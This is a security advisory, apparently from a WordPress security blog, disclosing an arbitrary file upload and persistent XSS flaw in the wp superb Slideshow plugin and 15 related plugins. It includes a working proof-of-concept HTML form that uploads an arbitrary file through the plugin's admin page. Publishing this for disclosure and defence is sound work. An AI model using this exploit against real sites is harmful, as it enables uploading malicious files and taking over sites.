In monitoring our websites for hacking attempts we recently have been finding vulnerabilities that exist in the current version of plugins. The latest such incident has lead us to finding that 15 plugins contained that same serious vulnerability we had just spotted in the plugin Vertical Slideshow. For whatever reason on the Plugin Directory website didn’t indicate that the developer of that plugin had any other plugins (while it normally would):
We first realized there were more when we had a request for a file from the wp superb Slideshow plugin, /wp-content/plugins/wp-superb-slideshow/css/default.css. In looking into that plugin we noticed it was from the same developer as the first plugin. Then we realized it shared the same vulnerable code as the first one, described in more detail in the post on that vulnerability, which allows for arbitrary file uploads (as well as persistent cross-site scripting (XSS) and possibly other security issues). That is the case as of version 2.4 of the plugin.
While we trying to see if the developer had anymore plugins we came across another account they had used for some of their plugins and then we found that all total there 16 plugins sharing the same code making them all vulnerable (two of them are only vulnerable to the persistent cross-site scripting (XSS) issue). Those will be documented in follow up posts.
Proof of Concept
The following proof of concept will create a new category in the plugin, with the selected file as the Category Image. If there are no pre-existing categories the uploaded file will be located in the directory /wp-content/uploads/superb/1_uploadfolder/big/.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin.php?page=superb_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="superb_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html>
- 6/7/2016 – WordPress.org Plugin Directory notified.